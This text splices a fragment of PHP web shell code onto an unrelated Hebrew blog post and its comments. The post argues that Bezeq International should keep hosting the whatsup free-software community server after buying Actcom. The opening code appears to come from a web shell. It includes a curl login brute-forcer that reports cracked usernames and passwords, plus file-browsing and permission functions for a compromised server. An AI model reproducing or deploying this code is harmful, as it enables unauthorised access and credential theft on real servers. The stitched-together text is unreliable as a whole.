CURLINFO_HTTP_CODE); if ( curl_errno($ch) == 28 ) { print " Error : Connection Timeout , Sleep for 5s .

"; sleep(5); } else if ( curl_errno($ch) == 0 ) { print "[~] Cracking Success With Username "$user" and Password "$pass"

"; exit; } else{ if($httpcode===0){ echo "No response
"; curl_setopt($ch, CURLOPT_URL, "http://$host:" . $port); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $cont = curl_exec($ch); $farr = explode("URL=",$cont); $narr = explode('">',$farr[1]); echo "Please change to this host -> ". $narr[0]; exit; } //echo $httpcode; } curl_close($ch); } public function DFSCurrent($slashtype){ echo "
Current folder : "; $truepath = array(); if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $path = $this->DFSDirFilter($this->Dec($GLOBALS['DFConfig'][0]['dfp'])); $path = $this->Dec($path); }else{ $path = getcwd(); } $dfsEP = explode($slashtype,$path); $dfsSZ = sizeof(($dfsEP)); $dfsGE = ""; for($c=0;$c<$dfsSZ;$c++){ array_push($truepath,$dfsEP[$c]); } if($GLOBALS['DFSPlatform']!=='win'){ $endslash = $this->DFSDirFilter($slashtype); echo "$slashtype"; } for($i=0;$iDFSDirFilter($dfsGE); //$this->string = preg_replace('/'.$slashtype.$slashtype.'/i',$slashtype,$dfsGE); echo "$dfsEP[$i]"; echo $slashtype; } } echo "
"; } public function DFSOG($file){ if($GLOBALS['DFSPlatform']!=='win'){ $owner_file = (fileowner($file)?:0); $group_file = (filegroup($file)?:0); $checkposix = $this->DFSDat('ini','disable_functions'); if($checkposix !=="None"){ $checkposix = explode(",",$checkposix); if(!in_array("posix_getpwuid",$checkposix)){ $ownx = posix_getpwuid($owner_file)['name']?:'nobody'; $grpx = posix_getpwuid($group_file)['name']; if(($ownx!==NULL && $ownx!=="") || ($grpx!==NULL && $grpx!=="")){ $owner_group = $ownx . ':' . ($grpx?:$ownx); }else{ $owner_group = "nobody:nobody"; } }else{ $owner_group = "-:-"; } }else{ $ownx = posix_getpwuid($owner_file)['name']?:'nobody'; $grpx = posix_getpwuid($group_file)['name']; if(($ownx!==NULL && $ownx!=="") || ($grpx!==NULL && $grpx!=="")){ $owner_group = $ownx . ':' . ($grpx?:$ownx); }else{ $owner_group = "nobody:nobody"; } } }else{ $owner_group = "-:-"; } return $owner_group; } public function DFSPerms($f) { // Special thanks to marijuana shell developer $p = $GLOBALS['DFSyntax'][1]($f); if (($p & 0xC000) == 0xC000) { $i = 's'; } elseif (($p & 0xA000) == 0xA000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000
זמן עדכון: 01/01/1970 00:00

חשיבות התרומה לקהילה

אתר whatsup, אחד האתרים הקהילתיים המיוחדים בישראל, אתר של קהילת התוכנה החופשית בישראל. אתר שלדעתי מהווה דוגמה ומופת לאתרים קהילתיים, שהצוות מאחוריו הצליח (במאמצים לא קטנים) לבנות קהילה מדהימה.

אתר זה עומד בפני אחד הצמתים המרכזיים בחייו ועלול אפילו להסגר.

בשנים האחרונות התאכסן השרת בחוות השרתים של חברת אקטקום (מיד תבינו מדוע אין קישור כאן). חברת אקטקום נקנתה לאחרונה על ידי חברת בזקבינלאומי שהחליטה לסגור את חוות השרתים של אקטקום בחיפה. החלטה שמבחינה עסקית קל מאד להבינה.
אבל בנוסף לסגירת חוות השרתים, החליטו בזקבינלאומי שלא להמשיך את האכסון ללא תשלום של שרתים קהילתיים כדוגמת השרת של whatsup.

אני מניח שיהיו רבים שיגידו שזה מהלך עסקי של חברה קפיטליסטית שחושבת על רווחיה.

מי שמכיר אותי או את הבלוג הזה, יודע שהגישה שלי קצת שונה. לא אני לא סוציאליסט, נהפוך הוא אני סולד מהמונח הזה. אני מגדיר את עצמי כקפיטליסט מושבע.
אז מדוע קפיטליסט מושבע תומך בתרומה לקהילה כמו אכסון שרת קהילתי?

יש לתרומה כזו מספר רב של סיבות שכולן מביאות לרווח לחברה, הן בטווח הקצר והן בטווח הארוך.

מה יקרה עכשיו?
אני לא יודע מה יקרה עם אתר whatsup. אני מאמין שכוחינו כקהילה רב ונמצא את הדרך להחזיק את האתר. אני אישית אנסה לדאוג לתרומות לאתר.

אבל מה יקרה עם חברת אקטקום או עם בזק בינלאומי?
אם הם ימשיכו בהתנהגות זו, לא ירחק היום והם יפלו.
כן אני יודע שזה נראה כמו זבוב שמאיים על פיל.

אבל לא. קהילת התוכנה החופשית היא קהילה חזקה, היא הקימה את כל האינטרנט בעולם אז כמה שנראה שמדובר בקבוצת נישה בישראל, זה כלל וכלל לא כך (לצערי גם חברי הקהילה לפעמים לא מודעים לכוחם).
אני כשאר הלקוחות של חברת אקטקום עומד כעת על הגדר. כולנו מצפים לראות מה יקרה בעתיד.
לא מעט אנשים ברשימות התפוצה של הקהילה בישראל שואלים ודנים בנושא ספקי אינטרנט בישראל וספקי אכסון לשרתים.
כזכור מדובר בקהילה של צרכני אינטרנט כבדים. אנשים אלו צריכים לא רק חיבור מהיר לאינטרנט ואולי שטח אכסון קטן.
אנשים אלו צריכים חיבור מהיר ואמין עם שירות ברמה גבוהה ומקום אכסון לשרתים שלמים.

למה שירות ברמה גבוהה, כאשר מדובר באנשים טכנולוגיים שמכירים את האינטרנט ברמה גבוהה מרוב תומכי האינטרנט בארץ?
זה בדיוק העניין. כשאנשים כאלו צריכים שירות, השירות הוא הרבה יותר מאשר לעבור על רשימת בדיקות חובה כאשר הבדיקה הראשונית היא אתחול המחשב...
אנשים כאלו הרי לא עובדים עם צעצוע בתור מערכת הפעלה.
יש לזכור שאנשים אלו הם חלק מהקהילה שבנתה את תשתית האינטרנט. אז כאשר אלו צריכים שירות, מדובר בתקלות אמיתיות ובצרכים מיוחדים.
כדי לתת שירות כזה, יש להחזיק צוות תמיכה ברמה גבוהה.
חברת אקטקום עד היום השכילה להחזיק צוות כזה.
האם הם ישכילו גם בעתיד כשהנהלת החברה היא בעצם בזקבינלאומי? על כך אין כרגע תשובה.

אני מאד מקווה, לטובת חברת בזקבינלאומי שהם יבינו שהם משחקים עם התשתית שלהם ולא עם קבוצת נישה.

עדכון: עושה רושם שבזקבינלאומי בעקבות לחץ ציבורי, כולל כתבה ב YNET הבינו שכדאי להם להמשיך באותו הסדר.
אני שמח לראות שלחץ ציבורי עוזר. חבל מאד שצריך לחץ של התקשורת על מנת להגיע לזה אבל העיקר שהגענו לזה והאתרים לא בסכנת סגירה.

 

 


הוספת תגובה
איזה שטויות. תומר 01/01/1970 00:00:00


הוספת תגובה      

ומדוע שטויות? אורי עידן 01/01/1970 00:00:00
אין לי בעיה לקבל ביקורת על דברי אבל שתיהיה מנומקת.


הוספת תגובה      

הוסף תגובה

שם:
דואר אלקטרוני: חובה, לא יוצג
אתר אינטרנט:
כותרת:
תוכן:
שלח מייל בתגובה להודעה